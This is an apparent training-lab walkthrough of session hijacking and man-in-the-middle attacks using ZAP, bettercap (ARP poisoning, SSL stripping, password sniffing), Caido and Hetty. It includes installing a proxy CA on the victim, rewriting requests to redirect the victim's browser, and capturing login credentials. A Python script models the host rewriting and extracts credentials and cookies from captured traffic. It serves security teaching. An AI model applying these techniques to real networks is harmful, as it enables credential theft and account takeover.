1. Perform Session Hijacking
Session hijacking allows an attacker to take over an active session by bypassing the authentication process.
Point the victim browser's proxy at the attacker PC running ZAP, then open the Break tab (the equivalent of Burp's Intercept).
Click the Set break on all requests and responses icon on the main ZAP toolbar. This toggles a global breakpoint that traps the next request or response from the victim's machine and displays it in the Break tab. Note: the icon turns from green to red while the breakpoint is set.
Now, as the victim browses, each request is held in the Break tab and can be edited and forwarded one at a time, so any parameter can be modified before it reaches the server.
Reference
Bettercap help
Start bettercap
Type help to list all commands.
To detect hosts on the network
Now enable SSL stripping (downgrade HTTPS to HTTP). Note that browsers honour HSTS, so sites on the HSTS preload list, or sites the victim has already visited over HTTPS, will not be downgraded.
Now perform ARP poisoning so that the victim's traffic to the gateway passes through the attacker's machine.
Now turn on the HTTP proxy and the sniffer.
To restrict the sniffer to capturing only passwords, we can set a capture filter as follows
Caido assists security professionals and enthusiasts in efficiently auditing web applications. It offers exploration tools, including sitemap, history, and intercept features, which aid in identifying vulnerabilities and analyzing requests in real-time.
Run the ipconfig /flushdns command to clear the DNS resolver cache, then close the Command Prompt.
Click windows Search icon on the Desktop, search for Caido and launch Caido from search bar.
The Caido application window appears. Click the menu beside the Start button and select Edit.
In the Edit Instance window, select the All interfaces (0.0.0.0) radio button so that the instance listens on every network interface (the victim machine must be able to reach the proxy; this also exposes the proxy to everyone on the network, so use it only in the lab), then click Save.
Click on Start button to start the local instance.
The Welcome to Caido pop-up appears. Click Login if you already have an account; if not, select Don't have an account? and you are redirected to the Caido dashboard in the browser.
The Create an account window appears. Fill in the details and click Create account.
Log in to your mail account; you will receive a verification mail from Team Caido. Copy the code and paste it into the Caido verification window.
After entering the code, your account will be activated as shown in the screenshot.
Navigate back to Caido application, in Welcome to Caido pop-up click on Login.
Welcome to Caido page will appear, enter your credentials and click Login.
Once logged in, Register your Caido Instance pop-up will appear. Type Session Hijacking and click Register.
Sign in with Caido window appears, click Allow to allow the access. Authorization Complete! pop-up appears, close the web browser and return to the application.
The Caido main window appears.
If a Caido pop-up appears, click Next or Ok in all the pop-ups.
Click on + Create a project button to create a new project. Create a project pop-up appears, name it as Session Hijacking and click Create.
Click on Intercept option on the left pane, as shown in the screenshot below.
Click the Forwarding toggle and wait until it changes to Queuing. From now on every request and response from the victim's machine is held in the Intercept tab instead of being passed straight through; the toggle turns from green to red while queuing is on.
Click Windows Server 2019 to switch to the Windows Server 2019 machine. Click Ctrl+Alt+Delete to activate the machine and login using Administrator/Pa$$w0rd.
Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and devices on the network.
Open Firefox web browser and navigate to http://10.10.1.11:8080/ca.crt. CA certificate will be downloaded automatically as shown in the screenshot.
In Firefox, open the application menu and select Settings.
On the Settings page, search for Certificates and open View Certificates.
Navigate to Authorities tab and click on Import…
In Select File containing CA certificate(s) to import window, select the recently downloaded ca.crt file and click Open.
When prompted, check Trust this CA to identify websites and click OK, then click OK in the Certificate Manager window. This step is what lets the proxy decrypt the victim's HTTPS traffic: the browser will now accept the certificates the proxy forges for any site.
On the Settings page, search for proxy and open it.
Connection Settings page appears and click Manual proxy configuration to configure a proxy.
Set HTTP Proxy to 10.10.1.11 and port to 8080, check the Also use this proxy for HTTPS box and click OK.
After saving, close the Settings and browser windows. You have now configured the proxy settings of the victim’s machine.
Open a new tab in Firefox web browser and place your mouse cursor in the address bar, type www.moviescope.com and press Enter.
If a certificate warning page appears, click the Advanced button.
On the warning page, choose the option to proceed to www.moviescope.com anyway to open the website.
Now, click Windows 11 to switch back to the attacker machine (Windows 11) and observe that Caido has begun to capture the requests of the victim’s machine.
On the Requests tab, in every captured www.moviescope.com GET request, change www.moviescope.com to www.goodshopping.com (in the request line and in the Host header) and forward the request.
Repeat this for every GET request Caido captures until the www.goodshopping.com page appears in the victim's browser. You will need to switch back and forth to the victim's machine to watch the browser status while you do this.
If you do not receive any request or you see a blank Requests tab then switch to Windows Server 2019 machine and refresh the browser to capture the request again.
Now, click on Windows Server 2019 to switch to the victim’s machine (Windows Server 2019); the browser displays the website that the attacker wants the victim’s machine to see (in this example, www.goodshopping.com).
The victim navigated to www.moviescope.com but now sees www.goodshopping.com: the address bar still shows www.moviescope.com, because the browser rendered the URL it was asked for, while the page content came from www.goodshopping.com after the proxy rewrote the request.
Now, change the proxy settings back to the defaults. In Firefox, open the application menu and select Settings. On the Settings page, search for proxy and open it. In the Connection Settings page, select the No Proxy radio button and click OK.
Hetty is an HTTP toolkit for security research. It aims to become an open-source alternative to commercial software such as Burp Suite Pro, with powerful features tailored to the needs of the InfoSec and bug bounty communities. Hetty can be used to perform Machine-in-the-middle (MITM) attack, manually create/edit requests, and replay proxied requests for HTTP clients and further intercept requests and responses for manual review.
Double-click hetty.exe.
If an Open File - Security Warning window appears, click Run.
A Command Prompt window appears, and Hetty initializes.
Now, minimize all the windows and launch any web browser (here, Mozilla Firefox). Go to http://localhost:8080 to open Hetty dashboard.
In the Hetty dashboard, click MANAGE PROJECTS button.
Projects page appears, type Project name as Moviescope and click + CREATE & OPEN PROJECT button.
You can observe that a new project name Moviescope has been created under Manage projects section with a status as Active.
A Proxy logs page appears, as shown in the screenshot.
Now, click Windows Server 2022 to switch to the Windows Server 2022 machine. Click Ctrl+Alt+Delete to activate the machine and login using Administrator/Pa$$w0rd.
Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and devices on the network.
Open Google Chrome web browser, click the Customize and control Google Chrome icon, and select Settings from the context menu.
On the Settings page, scroll-down and click System in the left-pane.
Scroll-down to the System section and click Open your computer’s proxy settings to configure a proxy.
A Settings window appears, with the Proxy settings in the right pane.
In the Manual proxy setup section, make the following changes:
Under Use a proxy server, click the Off toggle to switch it On.
In the Address field, type 10.10.1.11 (the IP address of the attacker’s machine, here, Windows 11).
In the Port field, type 8080.
Click Save.
After saving, close the Settings and browser windows. You have now configured the proxy settings of the victim’s machine.
Now, in the web browser go to http://www.moviescope.com.
Click Windows 11 to switch to the Windows 11 machine.
You can observe that the logs are captured in the Proxy logs page. Here, we are focusing on logs associated with moviescope.com website.
Click Windows Server 2022 to switch back to the Windows Server 2022 machine.
In the MovieScope website, log in as the victim with the credentials sam/test.
Now, click Windows 11 to switch to the Windows 11 machine.
In the Proxy logs page, scroll down to the logs for the moviescope website and look for the POST request captured for the target (the login submission).
Select the POST request and, in the lower section of the page, open the Body tab under the POST section.
Under the Body tab you can see the captured user credentials in clear text, as shown in the screenshot.
The captured credentials can be used to log in to the target user's account and obtain further sensitive information. They were readable because the login was submitted over plain HTTP through a proxy the attacker controls; with the HTTPS setup used in the Caido section, the same capture works once the victim trusts the proxy's CA.
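The two things the intercepting proxy did for the attacker in the Caido steps (rewriting the host in captured GET requests so the victim is served www.goodshopping.com) and the Hetty steps (reading the login out of a captured POST) are modelled below in pure Python. This is an added example, not code from the lab or from ZAP, Caido or Hetty; the hostnames, paths and form-field names are assumptions, and both HTTP messages are constructed here so the script runs offline.

```python
"""Added example: a minimal model of what an intercepting proxy (ZAP, Caido or
Hetty) does for the attacker in this lab. Not code from the lab or from those
tools. Hostnames, paths and form-field names are assumptions; both HTTP
messages below are constructed so the script runs offline."""
from urllib.parse import parse_qs

CRLF = "\r\n"
# Form fields that commonly carry a login (assumption; extend for the target app).
CREDENTIAL_FIELDS = {"username", "user", "login", "email", "password", "passwd", "pwd"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, version, headers, body).
    Headers are kept as an ordered list of (name, value) so the request can be
    rebuilt unchanged apart from the edits we make."""
    head, _, body = raw.partition(CRLF + CRLF)
    request_line, *header_lines = head.split(CRLF)
    method, target, version = request_line.split(" ", 2)
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, version, headers, body


def build_request(method, target, version, headers, body):
    """Inverse of parse_request: serialise the request for forwarding."""
    lines = [f"{method} {target} {version}"] + [f"{n}: {v}" for n, v in headers]
    return CRLF.join(lines) + CRLF + CRLF + body


def get_header(headers, name):
    """Case-insensitive header lookup; None when absent."""
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def rewrite_host(raw, old_host, new_host):
    """The Caido step: replace the host the victim asked for in the request line
    (absolute-form, as a browser sends it to an explicit proxy) and in the Host
    header, then forward. The victim's address bar still shows old_host because
    the browser rendered the URL before the request left the machine."""
    method, target, version, headers, body = parse_request(raw)
    target = target.replace(old_host, new_host)
    headers = [(n, v.replace(old_host, new_host) if n.lower() == "host" else v)
               for n, v in headers]
    return build_request(method, target, version, headers, body)


def extract_credentials(raw):
    """The Hetty step: read login fields out of a captured form POST, plus any
    Cookie header, since a captured session cookie hijacks the session without
    the password. Returns {} for requests that carry neither."""
    method, _, _, headers, body = parse_request(raw)
    found = {}
    ctype = get_header(headers, "Content-Type") or ""
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        for name, values in parse_qs(body, keep_blank_values=True).items():
            if name.lower() in CREDENTIAL_FIELDS:
                found[name] = values[0]
    cookie = get_header(headers, "Cookie")
    if cookie:
        found["cookie"] = cookie
    return found


# Constructed sample traffic (assumed paths; hosts and credentials as in the lab).
VICTIM_GET = (
    "GET http://www.moviescope.com/index.html HTTP/1.1" + CRLF
    + "Host: www.moviescope.com" + CRLF
    + "User-Agent: Mozilla/5.0" + CRLF
    + "Accept: text/html" + CRLF
    + CRLF
)
VICTIM_POST = (
    "POST http://www.moviescope.com/login.aspx HTTP/1.1" + CRLF
    + "Host: www.moviescope.com" + CRLF
    + "Content-Type: application/x-www-form-urlencoded" + CRLF
    + "Content-Length: 26" + CRLF
    + CRLF
    + "username=sam&password=test"
)

if __name__ == "__main__":
    print(rewrite_host(VICTIM_GET, "www.moviescope.com", "www.goodshopping.com"))
    print(extract_credentials(VICTIM_POST))
```

Running the script prints the rewritten GET (request line and Host now pointing at www.goodshopping.com, every other header untouched) and the dictionary of credentials harvested from the POST. A real proxy does exactly this on the live byte stream; the only reason it can see the POST body at all is that the traffic is plain HTTP or, in the Caido setup, that the victim's browser trusts the proxy's CA.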
Now, change the proxy settings back to the defaults. Click Windows Server 2022 to switch back to the Windows Server 2022 machine and open the computer's proxy settings again (Chrome Settings, System, Open your computer's proxy settings).
In the Settings window, under the Manual proxy setup section in the right pane, click the On button to toggle it back to Off, as shown in the screenshot.
Click the Proxy logs icon in the left pane.